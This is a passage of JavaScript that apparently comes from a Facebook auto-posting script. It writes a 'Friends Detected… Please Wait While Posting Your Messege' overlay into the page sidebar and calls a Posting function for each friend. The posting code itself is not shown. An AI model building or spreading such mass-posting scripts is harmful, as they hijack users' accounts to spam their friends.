        var display = "<div id='friend-edge-display'style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:15px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.1);border-radius:3px;border:1px solid rgba(200,200,50,0.2);background-color:rgba(255,255,255,0.9);color:#000000'>";
        display += "<div style='padding-bottom:10px;font-size:20px;'>" + Title + "</div>";
        display += arr.length + " Friends Detected<br/><br/>";
        display += "<div style='text-align:center;font-size:10px;white-space:pre-wrap;color:gray'>";
        display += getuname + "Please Wait While Posting Your Messege.<br/>";
        display += _text;
        window[tag + '_close'] = true;
        display += "</div>";
        display += "</div>";
        document.getElementById("pagelet_sidebar").innerHTML = display
    }
    Posting(arr[i])
}
```